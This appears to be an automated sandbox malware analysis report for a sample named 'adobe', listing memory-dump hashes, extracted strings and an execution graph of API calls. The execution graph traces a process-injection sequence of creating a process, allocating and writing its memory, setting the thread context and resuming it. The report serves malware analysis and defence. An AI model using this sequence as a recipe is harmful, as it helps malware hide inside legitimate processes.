                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 48442dee07e3b4f1981387ad7537ff6c54f858e0a932222d958bcbcd873eac25
                                    • Instruction ID: e57e31f0c012ea2cb7f448bbecce75e7acddb82143c5169408ff46f2321d5252
                                    • Opcode Fuzzy Hash: 48442dee07e3b4f1981387ad7537ff6c54f858e0a932222d958bcbcd873eac25
                                    • Instruction Fuzzy Hash: CB316E70E202159BCB58CFA9D99469EB7B6FF89300F108929E906EB350DB75ED42CB50
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 85daaf9ed11b6b75154eb509d126f10216b9e61723fa00315d6586575d2cd76b
                                    • Instruction ID: ba43a893434d178850abbbe9c15a60cbd3d27d9e221a2e77395e211490ecde09
                                    • Opcode Fuzzy Hash: 85daaf9ed11b6b75154eb509d126f10216b9e61723fa00315d6586575d2cd76b
                                    • Instruction Fuzzy Hash: A2215A75F102159FDB80CFA9D980AAEB7F5EF48710F128029EA05E7250EB75ED408B90
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4112929346.00000000013FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013FD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_13fd000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8132eec231f5b125dfc7a13555e010b76947f9081450281d9d4647372e6f7065
                                    • Instruction ID: 9a5d7ec4c4e32d281cf19e069b9533e0f90db18bc1c2306cb4d83f1cbf7ae102
                                    • Opcode Fuzzy Hash: 8132eec231f5b125dfc7a13555e010b76947f9081450281d9d4647372e6f7065
                                    • Instruction Fuzzy Hash: 0D213471504205DFCB15DF58D9C8B26BBA5FB84318F20C56DDA094B396C33AD447CA62
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4112929346.00000000013FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013FD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_13fd000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f3c7bf1fc7972a3e1e60002fe96c4aa6580eda65b848c57152a465ff90db3800
                                    • Instruction ID: f5152289698bc3548f58ecd8b7f1a124ee39b99bc67626234d98a1b6bc264641
                                    • Opcode Fuzzy Hash: f3c7bf1fc7972a3e1e60002fe96c4aa6580eda65b848c57152a465ff90db3800
                                    • Instruction Fuzzy Hash: 9D216B755093C08FDB13CF64D994711BF71AB46214F29C5EBD9898F2A7C23A980ACB62
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: dceadfbd36748bf75bdde29ead917275908351e782fc9c9f0b85fd150ee85d1c
                                    • Instruction ID: a5be3b172590d8dbb3bec8044e40c7528da185bcc13817c28edf36f3d2df3d2f
                                    • Opcode Fuzzy Hash: dceadfbd36748bf75bdde29ead917275908351e782fc9c9f0b85fd150ee85d1c
                                    • Instruction Fuzzy Hash: 5E01F531B102101FD7648BADD814B6BB7DADBC9750F15C83AE60ACB352DA26DC0243A1
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a42a8ded06f1da6982a2914ca616fc8dbf7f813e280f7e488f5a1a607ed5af4a
                                    • Instruction ID: e08e19d572473a7b38bd5ff87a4780d8e5f6a7924c80396df9483c574f65a404
                                    • Opcode Fuzzy Hash: a42a8ded06f1da6982a2914ca616fc8dbf7f813e280f7e488f5a1a607ed5af4a
                                    • Instruction Fuzzy Hash: 8A117C36B101284BCF949B69D8146AF73BAABC8651F024439D506E7354EE75DC028BD0
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c54d7daddb4bc32767412f03fb68d40640bf26b1c13c493b7c766d6b0788938f
                                    • Instruction ID: 603671186a4913cef7164437d66f321d171b304023c5b8b6113012867956b06f
                                    • Opcode Fuzzy Hash: c54d7daddb4bc32767412f03fb68d40640bf26b1c13c493b7c766d6b0788938f
                                    • Instruction Fuzzy Hash: 7C01FC72B202100FDB658F7DD85072A77E6DBC6760F118879E24ECB341EE65DC028385
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5ef4650828051e9fb666a79d8af181ac39a796e459612c42a5434af1ad162288
                                    • Instruction ID: 5910f0ad2b9b7a64b887531b18ebe0a2a02a9a64f3957f7d79e02608488deae5
                                    • Opcode Fuzzy Hash: 5ef4650828051e9fb666a79d8af181ac39a796e459612c42a5434af1ad162288
                                    • Instruction Fuzzy Hash: C321BFB1D01269AFCB10CF9AD984ADEFBB4FB48314F11852AE918A7340D374A954CFE5
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 13e58da8b82478d6902fd492433fab031aa24e3c6f63d80da591a5f1a95c1d69
                                    • Instruction ID: 5bd97339eff1acf1f9e0883eec80e3e55d9ecbc20279e2fe568b05f41251f829
                                    • Opcode Fuzzy Hash: 13e58da8b82478d6902fd492433fab031aa24e3c6f63d80da591a5f1a95c1d69
                                    • Instruction Fuzzy Hash: 5001F1307202249FDB619B7CD810BAB77DAEB8A754F158839E60ECB340EE26EC014390
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a52905452572f8de24a868811612624c94d169255e2ce54fc6437d1c93896214
                                    • Instruction ID: d7ccb56b9e1917444dddda64f92afdbf8e3e684bbc3e00fb7e16a0c42ff30383
                                    • Opcode Fuzzy Hash: a52905452572f8de24a868811612624c94d169255e2ce54fc6437d1c93896214
                                    • Instruction Fuzzy Hash: DB01B136B100641BDFA487799C14AFB37BF9BC8311F0A4139E506E7398EE648C0287E1
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2dd27a10eca10a24c91a824a8cc07741d15d9bff231ad36ee4443d0856d080b6
                                    • Instruction ID: 94ef2e6aad66f623f2cca491a53106f5faaca8636f85c0e94509c50b3a0b0d80
                                    • Opcode Fuzzy Hash: 2dd27a10eca10a24c91a824a8cc07741d15d9bff231ad36ee4443d0856d080b6
                                    • Instruction Fuzzy Hash: EE11B3B5D01259AFCB00DF9AD984ADEFBB4FB48314F11852AE518A7340C374A554CFE5
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 50cf1698a4cef791d9be38df5f2defde30c46841c6f66a0d071e5d72d738ef40
                                    • Instruction ID: 6e2b814f043a7b5dbfa2b6dc34691b8985f0e550afa7b333a2e9e2e8156280bd
                                    • Opcode Fuzzy Hash: 50cf1698a4cef791d9be38df5f2defde30c46841c6f66a0d071e5d72d738ef40
                                    • Instruction Fuzzy Hash: 60018631B104201BDB649BBD995472BB2DADBC9720F11C83AE60ACB355ED66DC424395
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4f19baf15631b9bd1c9f105a1b3e9d348db9850725a8947d5d211a2f6902ef02
                                    • Instruction ID: 26ac3cd7b9d31a287e936647b2e7bc6493f36369c9a86ad3182019a96e950feb
                                    • Opcode Fuzzy Hash: 4f19baf15631b9bd1c9f105a1b3e9d348db9850725a8947d5d211a2f6902ef02
                                    • Instruction Fuzzy Hash: C9018C72B201210BDB649B7DE85472E73DADBC9A65F118839E20ECB340EE66DC424385
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0695902e5e0dba5a76a9a380e145bb3d1e57ac5bc623faf443652a081b38743d
                                    • Instruction ID: 746ca3b08834d0c372e979698a67e93ee8dbdad7402e8b5e780b67f238a81c26
                                    • Opcode Fuzzy Hash: 0695902e5e0dba5a76a9a380e145bb3d1e57ac5bc623faf443652a081b38743d
                                    • Instruction Fuzzy Hash: FC018130B200258FDB64DBBDD45476AB3DAEB89B54F148829E60ECB340EE27EC414780
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d7b5a3f4629b860c65987b1cad230f8d8e678048b1cb728a1dfeba83aeb594d2
                                    • Instruction ID: 265974d9f9ca9fabdc82bc4de0fb0ec9a28e04d684c692c3e55b70c56068ff9e
                                    • Opcode Fuzzy Hash: d7b5a3f4629b860c65987b1cad230f8d8e678048b1cb728a1dfeba83aeb594d2
                                    • Instruction Fuzzy Hash: 53F0E5719293C8ABCB11DB74C8547DB7FA9DB07204F1A84E6D444CB202E235CA02C362
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3bd82ae8ca65274fc3454b2c4d1ce8315d717affde06d8b7be6468b424b4745b
                                    • Instruction ID: 6e7c7a75a4cf1898a9a58601f41e47ea6fb80939b80c7d306e40b1da6032a591
                                    • Opcode Fuzzy Hash: 3bd82ae8ca65274fc3454b2c4d1ce8315d717affde06d8b7be6468b424b4745b
                                    • Instruction Fuzzy Hash: BEE0C2B0E34148ABDF50DFB4C94575F77ACDB06204F2184B4D509CB201E232CA028340
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
                                    • API String ID: 0-1324371161
                                    • Opcode ID: 045d7212c9ec75ceda647d8c8619144ba30cee3fd8dfb1ac148a436eafd86c07
                                    • Instruction ID: 3bfc4a2e14a50d53f8dfdbb4d40ee7952a3205e82c520d5ffabfa2ab43f1f45e
                                    • Opcode Fuzzy Hash: 045d7212c9ec75ceda647d8c8619144ba30cee3fd8dfb1ac148a436eafd86c07
                                    • Instruction Fuzzy Hash: 03123A30E102198FDB64DF69D944AAEB7B2FF88300F2185A9D509AB364DB34DD85CF90
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
                                    • API String ID: 0-1078448309
                                    • Opcode ID: 57837fc21cc0e339725fd38177fd3aabf57e489eed9864150ae3496d22cdf433
                                    • Instruction ID: 8eb6a39c8d2eb4e4585f77b85a8bf994595f6191dff61a467431d6b0b19b5710
                                    • Opcode Fuzzy Hash: 57837fc21cc0e339725fd38177fd3aabf57e489eed9864150ae3496d22cdf433
                                    • Instruction Fuzzy Hash: 1A91BF30A20209DFDB64DF65DA44BAEB7F6EF84300F298429D5069B394DB39DC85CB90
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $kq$$kq$$kq$$kq$$kq$$kq
                                    • API String ID: 0-1342094364
                                    • Opcode ID: fc79ef1fb60e36561a4f4712a86182c81837d559028e08219ae720554d55e6c4
                                    • Instruction ID: 0dd9c5533f561290b4427f01ddd412cc7b7e12e4cda8f46fc5b93ee5734aa114
                                    • Opcode Fuzzy Hash: fc79ef1fb60e36561a4f4712a86182c81837d559028e08219ae720554d55e6c4
                                    • Instruction Fuzzy Hash: D1F14C34B10205CFDB54DBA8D554AAEB7B7FF88305F258468D4059B3A8DB35EC86CB90
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $kq$$kq$$kq$$kq
                                    • API String ID: 0-2881790790
                                    • Opcode ID: 0355c8ffe079c50b5921ffa14dc464292164a2c010f7d5229fb9be78c92dfd89
                                    • Instruction ID: 72bcf7710b980543a3dfc70f6f6d8c337025d9eb43a4a5ddabb3aa6bf231634a
                                    • Opcode Fuzzy Hash: 0355c8ffe079c50b5921ffa14dc464292164a2c010f7d5229fb9be78c92dfd89
                                    • Instruction Fuzzy Hash: 8CB15C30E20209CFDB64DF68D9546AEB7B2FF88305F258429D5069B3A4DB35DC86CB81
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $kq$$kq$$kq$$kq
                                    • API String ID: 0-2881790790
                                    • Opcode ID: edc4db00edfe3f7cdd5655e4ff539e9f8b2920622c212c6a105b950f5abf8427
                                    • Instruction ID: 0a96ce4a9a7be551d96e0e3124a2cfe1ca285e05fb513fc3e8bdf69dacf2f102
                                    • Opcode Fuzzy Hash: edc4db00edfe3f7cdd5655e4ff539e9f8b2920622c212c6a105b950f5abf8427
                                    • Instruction Fuzzy Hash: A0519434F20205CFDF69DB68E9805AEB3B6EB84315F29852AD909D7354DB35EC41CB90
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: LRkq$LRkq$$kq$$kq
                                    • API String ID: 0-2392252538
                                    • Opcode ID: ce0f43c4a97a1c11f346c9e40cffd9722b91b9915ab2d37ba781c490e59d18a1
                                    • Instruction ID: aaf201dc211c70c96932950033bdae5b7bb2af31017282ddef8b4ff003076f87
                                    • Opcode Fuzzy Hash: ce0f43c4a97a1c11f346c9e40cffd9722b91b9915ab2d37ba781c490e59d18a1
                                    • Instruction Fuzzy Hash: F4518E30B102019FDB58DB69E954A6AB7F6FF88300F1585A9E5029B3A5DF34EC44CBA1

                                    Execution Graph

                                    Execution Coverage:10.4%
                                    Dynamic/Decrypted Code Coverage:99.2%
                                    Signature Coverage:0%
                                    Total number of Nodes:360
                                    Total number of Limit Nodes:19
                                    execution_graph 52001 7466a24 52006 7467396 52001->52006 52022 7467321 52001->52022 52037 7467330 52001->52037 52002 7466914 52007 7467399 52006->52007 52008 7467324 52006->52008 52052 7467a41 52008->52052 52057 7467950 52008->52057 52062 7467742 52008->52062 52067 7467bc2 52008->52067 52072 7467984 52008->52072 52080 7467bd4 52008->52080 52085 7467d54 52008->52085 52090 7467b2b 52008->52090 52097 7467c2b 52008->52097 52102 74678dd 52008->52102 52107 7467cbd 52008->52107 52112 7467fee 52008->52112 52009 7467352 52009->52002 52023 7467330 52022->52023 52025 7467d54 2 API calls 52023->52025 52026 7467bd4 2 API calls 52023->52026 52027 7467984 4 API calls 52023->52027 52028 7467bc2 2 API calls 52023->52028 52029 7467742 2 API calls 52023->52029 52030 7467950 2 API calls 52023->52030 52031 7467a41 2 API calls 52023->52031 52032 7467fee 2 API calls 52023->52032 52033 7467cbd 2 API calls 52023->52033 52034 74678dd 2 API calls 52023->52034 52035 7467c2b 2 API calls 52023->52035 52036 7467b2b 4 API calls 52023->52036 52024 7467352 52024->52002 52025->52024 52026->52024 52027->52024 52028->52024 52029->52024 52030->52024 52031->52024 52032->52024 52033->52024 52034->52024 52035->52024 52036->52024 52038 746734a 52037->52038 52040 7467d54 2 API calls 52038->52040 52041 7467bd4 2 API calls 52038->52041 52042 7467984 4 API calls 52038->52042 52043 7467bc2 2 API calls 52038->52043 52044 7467742 2 API calls 52038->52044 52045 7467950 2 API calls 52038->52045 52046 7467a41 2 API calls 52038->52046 52047 7467fee 2 API calls 52038->52047 52048 7467cbd 2 API calls 52038->52048 52049 74678dd 2 API calls 52038->52049 52050 7467c2b 2 API calls 52038->52050 52051 7467b2b 4 API calls 52038->52051 52039 7467352 52039->52002 52040->52039 52041->52039 52042->52039 52043->52039 52044->52039 52045->52039 52046->52039 52047->52039 52048->52039 52049->52039 52050->52039 52051->52039 52053 7467a47 52052->52053 52054 7467e62 52053->52054 52117 7466360 52053->52117 52121 7466358 52053->52121 52054->52009 52058 74678ec 52057->52058 52059 7467879 52057->52059 52125 7466270 52058->52125 52129 7466269 52058->52129 52059->52009 52063 746776e 52062->52063 52133 74664ec 52063->52133 52137 74664f8 52063->52137 52068 7467d19 52067->52068 52141 74660d3 52068->52141 52145 74660d8 52068->52145 52069 7467d34 52069->52009 52073 7467f8e 52072->52073 52074 7467991 52072->52074 52076 74660d3 Wow64SetThreadContext 52073->52076 52077 74660d8 Wow64SetThreadContext 52073->52077 52075 7467e62 52074->52075 52078 7466360 ReadProcessMemory 52074->52078 52079 7466358 ReadProcessMemory 52074->52079 52075->52009 52076->52074 52077->52074 52078->52075 52079->52075 52081 7467b62 52080->52081 52082 7467e90 52081->52082 52083 7466270 WriteProcessMemory 52081->52083 52084 7466269 WriteProcessMemory 52081->52084 52082->52009 52083->52081 52084->52081 52086 7467d73 52085->52086 52087 7467c42 52085->52087 52087->52085 52149 7465bf0 52087->52149 52153 7465be8 52087->52153 52157 74661b0 52090->52157 52161 74661aa 52090->52161 52091 7467e90 52091->52009 52092 7467b4d 52092->52091 52095 7466270 WriteProcessMemory 52092->52095 52096 7466269 WriteProcessMemory 52092->52096 52095->52092 52096->52092 52098 7467c31 52097->52098 52099 7467d73 52098->52099 52100 7465bf0 ResumeThread 52098->52100 52101 7465be8 ResumeThread 52098->52101 52100->52098 52101->52098 52103 74678ec 52102->52103 52105 7466270 WriteProcessMemory 52103->52105 52106 7466269 WriteProcessMemory 52103->52106 52104 7467879 52104->52009 52105->52104 52106->52104 52108 7467ce0 52107->52108 52110 7466270 WriteProcessMemory 52108->52110 52111 7466269 WriteProcessMemory 52108->52111 52109 74681e0 52110->52109 52111->52109 52113 7467ff4 52112->52113 52115 7466360 ReadProcessMemory 52113->52115 52116 7466358 ReadProcessMemory 52113->52116 52114 7467e62 52114->52009 52115->52114 52116->52114 52118 74663ab ReadProcessMemory 52117->52118 52120 74663ef 52118->52120 52120->52054 52122 7466360 ReadProcessMemory 52121->52122 52124 74663ef 52122->52124 52124->52054 52126 74662b8 WriteProcessMemory 52125->52126 52128 746630f 52126->52128 52128->52059 52130 7466270 WriteProcessMemory 52129->52130 52132 746630f 52130->52132 52132->52059 52134 74664f8 CreateProcessA 52133->52134 52136 7466743 52134->52136 52136->52136 52138 7466581 CreateProcessA 52137->52138 52140 7466743 52138->52140 52140->52140 52142 74660d8 Wow64SetThreadContext 52141->52142 52144 7466165 52142->52144 52144->52069 52146 746611d Wow64SetThreadContext 52145->52146 52148 7466165 52146->52148 52148->52069 52150 7465c30 ResumeThread 52149->52150 52152 7465c61 52150->52152 52152->52087 52154 7465bf0 ResumeThread 52153->52154 52156 7465c61 52154->52156 52156->52087 52158 74661f0 VirtualAllocEx 52157->52158 52160 746622d 52158->52160 52160->52092 52162 74661b0 VirtualAllocEx 52161->52162 52164 746622d 52162->52164 52164->52092 52165 50a4668 52166 50a467a 52165->52166 52167 50a4686 52166->52167 52171 50a4778 52166->52171 52176 50a3e28 52167->52176 52169 50a46a5 52172 50a479d 52171->52172 52180 50a4878 52172->52180 52184 50a4888 52172->52184 52177 50a3e33 52176->52177 52192 50a5c68 52177->52192 52179 50a7076 52179->52169 52182 50a4888 52180->52182 52181 50a498c 52181->52181 52182->52181 52188 50a44b0 52182->52188 52186 50a48af 52184->52186 52185 50a498c 52185->52185 52186->52185 52187 50a44b0 CreateActCtxA 52186->52187 52187->52185 52189 50a5918 CreateActCtxA 52188->52189 52191 50a59db 52189->52191 52193 50a5c73 52192->52193 52196 50a74f4 52193->52196 52195 50a798d 52195->52179 52197 50a74ff 52196->52197 52200 50a7524 52197->52200 52199 50a7a62 52199->52195 52201 50a752f 52200->52201 52202 50a7554 5 API calls 52201->52202 52203 50a7b65 52202->52203 52203->52199 51744 120d1b4 51745 120d1cc 51744->51745 51746 120d226 51745->51746 51751 5ca1ea8 51745->51751 51755 5ca1e97 51745->51755 51759 5ca117c 51745->51759 51768 5ca2bf9 51745->51768 51752 5ca1ece 51751->51752 51753 5ca117c CallWindowProcW 51752->51753 51754 5ca1eef 51753->51754 51754->51746 51756 5ca1ea8 51755->51756 51757 5ca117c CallWindowProcW 51756->51757 51758 5ca1eef 51757->51758 51758->51746 51760 5ca1187 51759->51760 51761 5ca2c69 51760->51761 51763 5ca2c59 51760->51763 51793 5ca12a4 51761->51793 51777 5ca2e5c 51763->51777 51783 5ca2d90 51763->51783 51788 5ca2d80 51763->51788 51764 5ca2c67 51769 5ca2c08 51768->51769 51770 5ca2c69 51769->51770 51772 5ca2c59 51769->51772 51771 5ca12a4 CallWindowProcW 51770->51771 51773 5ca2c67 51771->51773 51774 5ca2e5c CallWindowProcW 51772->51774 51775 5ca2d80 CallWindowProcW 51772->51775 51776 5ca2d90 CallWindowProcW 51772->51776 51774->51773 51775->51773 51776->51773 51778 5ca2e1a 51777->51778 51779 5ca2e6a 51777->51779 51797 5ca2e48 51778->51797 51800 5ca2e38 51778->51800 51780 5ca2e30 51780->51764 51784 5ca2da4 51783->51784 51786 5ca2e48 CallWindowProcW 51784->51786 51787 5ca2e38 CallWindowProcW 51784->51787 51785 5ca2e30 51785->51764 51786->51785 51787->51785 51789 5ca2d90 51788->51789 51791 5ca2e48 CallWindowProcW 51789->51791 51792 5ca2e38 CallWindowProcW 51789->51792 51790 5ca2e30 51790->51764 51791->51790 51792->51790 51794 5ca12af 51793->51794 51795 5ca434a CallWindowProcW 51794->51795 51796 5ca42f9 51794->51796 51795->51796 51796->51764 51798 5ca2e59 51797->51798 51804 5ca4280 51797->51804 51798->51780 51801 5ca2e48 51800->51801 51802 5ca2e59 51801->51802 51803 5ca4280 CallWindowProcW 51801->51803 51802->51780 51803->51802 51805 5ca12a4 CallWindowProcW 51804->51805 51806 5ca429a 51805->51806 51806->51798 51964 5f519c0 51967 5f506e8 51964->51967 51966 5f519df 51968 5f506f3 51967->51968 51970 50a8b10 5 API calls 51968->51970 51971 50a7554 5 API calls 51968->51971 51969 5f51a64 51969->51966 51970->51969 51971->51969 51972 5f55040 51973 5f5508e DrawTextExW 51972->51973 51975 5f550e6 51973->51975 51999 5f5a920 FindCloseChangeNotification 52000 5f5a987 51999->52000 51814 50ad420 51815 50ad466 51814->51815 51819 50ad5f0 51815->51819 51823 50ad600 51815->51823 51816 50ad553 51820 50ad600 51819->51820 51826 50acfb0 51820->51826 51824 50acfb0 DuplicateHandle 51823->51824 51825 50ad62e 51824->51825 51825->51816 51827 50ad668 DuplicateHandle 51826->51827 51828 50ad62e 51827->51828 51828->51816 51829 5caabe0 51830 5caabf0 51829->51830 51833 5ca7b9c 51830->51833 51832 5caabff 51834 5ca7ba7 51833->51834 51835 5caac32 51834->51835 51838 50a8b10 51834->51838 51845 50a7554 51834->51845 51835->51832 51839 50a8b15 51838->51839 51841 50a8dd3 51839->51841 51852 50ab080 51839->51852 51840 50a8e11 51840->51835 51841->51840 51856 50ad149 51841->51856 51861 50ad158 51841->51861 51846 50a755f 51845->51846 51848 50a8dd3 51846->51848 51849 50ab080 4 API calls 51846->51849 51847 50a8e11 51847->51835 51848->51847 51850 50ad158 5 API calls 51848->51850 51851 50ad149 5 API calls 51848->51851 51849->51848 51850->51847 51851->51847 51866 50ab0b8 51852->51866 51870 50ab0a9 51852->51870 51853 50ab096 51853->51841 51858 50ad158 51856->51858 51857 50ad19d 51857->51840 51858->51857 51913 50ad308 51858->51913 51917 50ad2f9 51858->51917 51862 50ad179 51861->51862 51863 50ad19d 51862->51863 51864 50ad308 5 API calls 51862->51864 51865 50ad2f9 5 API calls 51862->51865 51863->51840 51864->51863 51865->51863 51867 50ab0c7 51866->51867 51874 50ab19f 51866->51874 51884 50ab1b0 51866->51884 51867->51853 51872 50ab19f 3 API calls 51870->51872 51873 50ab1b0 3 API calls 51870->51873 51871 50ab0c7 51871->51853 51872->51871 51873->51871 51875 50ab1b0 51874->51875 51878 50ab1e4 51875->51878 51894 50aab54 51875->51894 51878->51867 51879 50ab3e8 GetModuleHandleW 51881 50ab415 51879->51881 51880 50ab1dc 51880->51878 51880->51879 51881->51867 51885 50ab1c1 51884->51885 51888 50ab1e4 51884->51888 51886 50aab54 GetModuleHandleW 51885->51886 51887 50ab1cc 51886->51887 51887->51888 51892 50ab43a 2 API calls 51887->51892 51893 50ab448 2 API calls 51887->51893 51888->51867 51889 50ab3e8 GetModuleHandleW 51891 50ab415 51889->51891 51890 50ab1dc 51890->51888 51890->51889 51891->51867 51892->51890 51893->51890 51895 50ab3a0 GetModuleHandleW 51894->51895 51897 50ab1cc 51895->51897 51897->51878 51898 50ab448 51897->51898 51903 50ab43a 51897->51903 51899 50aab54 GetModuleHandleW 51898->51899 51900 50ab45c 51899->51900 51901 50ab481 51900->51901 51909 50aabb8 51900->51909 51901->51880 51904 50ab448 51903->51904 51905 50aab54 GetModuleHandleW 51904->51905 51906 50ab45c 51905->51906 51907 50ab481 51906->51907 51908 50aabb8 LoadLibraryExW 51906->51908 51907->51880 51908->51907 51910 50ab608 LoadLibraryExW 51909->51910 51912 50ab681 51910->51912 51912->51901 51914 50ad315 51913->51914 51915 50ad34f 51914->51915 51921 50acee8 51914->51921 51915->51857 51918 50ad308 51917->51918 51919 50ad34f 51918->51919 51920 50acee8 5 API calls 51918->51920 51919->51857 51920->51919 51922 50acef3 51921->51922 51924 50adc60 51922->51924 51925 50ad014 